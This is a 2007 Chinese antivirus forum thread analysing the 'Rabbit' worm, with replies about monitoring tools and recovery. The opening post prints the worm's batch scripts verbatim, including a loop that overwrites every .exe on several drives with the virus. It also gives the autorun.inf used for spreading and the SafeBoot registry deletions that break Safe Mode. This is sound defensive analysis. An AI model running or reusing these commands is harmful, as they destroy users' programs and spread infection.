瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 【原创】行为恶劣的蠕虫病毒(兔宝宝)的分析
newcenturymoon - 2007-4-8 23:10:00
这是个行为极其恶劣的病毒
1.破坏安全模式
2.导致系统无法关机 重启 注销
3.直接替换exe文件
4.导致冰刃 sreng SSM等安全工具无法运行
目前所有杀毒软件都还无法查杀
运行文件后:
释放如下文件
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf

C:\WINDOWS\system32\loveRabbit.exe在进程里有两个 互相监视 不断调用cmd.exe (用以执行C:\WINDOWS\system32\love.bat和C:\WINDOWS\system32\loveRabbit.bat的内容)和attrib.exe

C:\WINDOWS\system32\loveRabbit.bat内容如下
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
不断为这些文件加上系统和隐藏属性

C:\WINDOWS\system32\love.bat内容如下
FOR  %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR  /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR  /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe

每个分区下面释放一个Rabbit.exe和一个autorun.inf
autorun.inf 内容
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
达到双击运行之目的
右键增加 “自动播放”

注册表方面:
增加HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath
指向C:\WINDOWS\system32\JK.exe (这项应该导致他的开机启动,本人水平有限,不懂这项注册表,望大家指教)
删除键
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
删除值
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
达到破坏安全模式的目的

还有一点是最厉害的,他生成的msexch400.dll插入系统的winlogon 进程,使得winlogon.exe的线程数会不断上升,干扰正常的关机和注销,并在loveRabbit.exe被结束时由winlogon.exe重新启动,注销或者关机;


另外此病毒会破坏冰刃 sreng 的运行(即便将他们改名,我测试时候就是改成了fdfdsfds.bat,可照样被结束,不知道原理还..)
测试病毒时候 SSM也没有任何反映 机器直接卡死


另外 病毒体内留下文字:
I LOVE Rabbit ,and you ? look:http://z8232****.diy.myrice.com/Rabbit.htm (摘自艾玛博客里的分析,感谢)

此病毒行为比较恶劣 不过我想应该是个病毒的雏形或是恶意文件 还没有公开
不过如果被黑客利用来网上挂马或者制作大量变种 后果将不堪设想
因为病毒是替换的文件 而不是感染文件 所以杀毒软件连修复的机会都没有...
中了就直接格吧...

由于本人对于批处理 某些注册表项目不甚了解 所以

分析过程中 轩辕小聪 懒人小G 六翼刺猬 艾玛 正奇等对本人做了指点 在此表示感谢!

附 感染系统后的截图

附件: 554345200748230446.jpg
newcenturymoon - 2007-4-8 23:15:00
另一张图

附件: 554345200748230533.jpg
天月来了 - 2007-4-9 0:00:00
你的处理呢?


newcenturymoon
天月来了 - 2007-4-9 0:02:00
看你桌面有  syscheck


那玩意有没被禁啊?
horseluke11 - 2007-4-9 0:06:00
的确比较恶劣......

非专业工具不能恢复........
newcenturymoon - 2007-4-9 0:17:00
引用:
【天月来了的贴子】你的处理呢?


newcenturymoon
………………

无法处理 文件都被替换了 怎么处理丫 感染了就是癌症 没治
超级游戏迷 - 2007-4-9 0:41:00
是要小心了,感谢楼主提醒!
桃子CiCi - 2007-4-9 0:59:00
我是一只超级小菜鸟
请教一个问题啊

newcenturymoon:你是怎么知道病毒释放了哪些文件
并且创建了哪些进程,修改了哪些注册表的啊?

请问是用的工具察看的事件过程?还是其他方法呢?
newcenturymoon - 2007-4-9 1:09:00
其实很简单 找些监控工具 如regmon filemon 或者SSM 这类系统监控的工具就行
天月来了 - 2007-4-9 1:19:00
newcenturymoon 哎!!!

也是哦!!!

文件都替换没了哦。

这可是够狠的了。

中了的都倒霉了。


桃子啊!!!!!

他们大多用那几个工具监控的。

一步一步同意释放,然后记下来。

真的很好玩的。

啥时你自己试个毒毒玩玩。
桃子CiCi - 2007-4-9 1:23:00
不好意思啊,我不是蛮懂
我下载了SSM,但是好像只能看到新创建出来的进程
SSM好像只能看到创建的进程吧,难道你说的释放的文件就是进程中对应的文件?

然后还有病毒删除了注册表的键值是怎么发现的呢?
天月来了 - 2007-4-9 1:27:00
恩!!!

同时借助其他的工具,就可以知道这些进程或这些进程里注入的模块了。

注册表的修改也一样可以监控的。


还有:这病毒的鸟人爱小兔兔??????????
桃子CiCi - 2007-4-9 1:29:00
哎……
我不会设置SSM
只能把它当监控器用了
我中马的时候,SSM一点提示都没有,只能看到出现了异常的进程
呵呵
我把它设成自学习模式在
天月来了 - 2007-4-9 1:34:00
看到异常就行了啊。

我自己的电脑系统,只用一个任务管理器就行了哦。

有问题就上瑞星防火墙监控。

估计是中了。

然后再来SRENG日志分析。

最后才动用这些个宝贝东西干毒毒。
天月来了 - 2007-4-9 1:37:00
实际上SSM可以看到所有进程和插入进程的模块的。

大多我们正在用的工具都能看的,例如:冰刃。


得互相配合。
baohe - 2007-4-9 9:41:00
【回复“newcenturymoon”的帖子】
【......另外此病毒会破坏冰刃 sreng 的运行(即便将他们改名,我测试时候就是改成了fdfdsfds.bat,可照样被结束,不知道原理还..)
测试病毒时候 SSM也没有任何反映 机器直接卡死.......】
程序文件夹中的所有.exe已经被替换为病毒体(文件大小260K;文件名还是原来的文件名,图标已经变为“兔宝宝”或普通的.exe文件图标)
newcenturymoon - 2007-4-9 9:44:00
那为什么不能重启 注销或者 关机呢
newcenturymoon - 2007-4-9 9:46:00
那为什么不能关机 重启 或者注销呢
baohe - 2007-4-9 9:48:00
引用:
【newcenturymoon的贴子】那为什么不能关机 重启 或者注销呢
………………

我在“影子系统”中运行rabbit.exe,SSM和Tiny的提问——————一路绿灯放行,没遇到你说的这种现象。
newcenturymoon - 2007-4-9 9:51:00
我用的虚拟机 不能关机注销或者重启 其他测试的人也有碰到 这个现象 并且其他人用SSM监控有 SSM 不报警的情况
baohe - 2007-4-9 9:54:00
引用:
【newcenturymoon的贴子】...... 并且其他人用SSM监控有 SSM 不报警的情况
………………

设置问题吧
两个铁球 - 2007-4-9 10:01:00
SSM不报?应该是先前图省事,对SSM的设置所致吧?
新世纪月亮的帖子较白鹤版主的又有不同的角度,学习了。谢谢!
newcenturymoon - 2007-4-9 14:47:00
猫叔 这个病毒就是导致不能重启 注销或者关机
刚才看到剑盟的一个人写了分析 看看蛤
http://bbs.2dai.com/viewthread.php?tid=564433&pid=8463929&page=1&extra=page%3D1#pid8463929
baohe - 2007-4-9 14:54:00
病毒作者比较猖狂
作者blog地址:http://hi.baidu.com/bsgzz/blog/item/4e58d303d4abe9763912bb94.html

附件: 155847200749144444.jpg
newcenturymoon - 2007-4-9 15:02:00
现在的作者都是明目张胆
baohe - 2007-4-9 15:16:00
引用:
【newcenturymoon的贴子】现在的作者都是明目张胆
………………

看了他写的几篇搏文。
感觉这孩子需要看看心里医生。
newcenturymoon - 2007-4-9 17:05:00
这年头 BT的人很多 ...
newcenturymoon - 2007-4-9 17:06:00
不过这个病毒应该不会流行开来
1
查看完整版本: 【原创】行为恶劣的蠕虫病毒(兔宝宝)的分析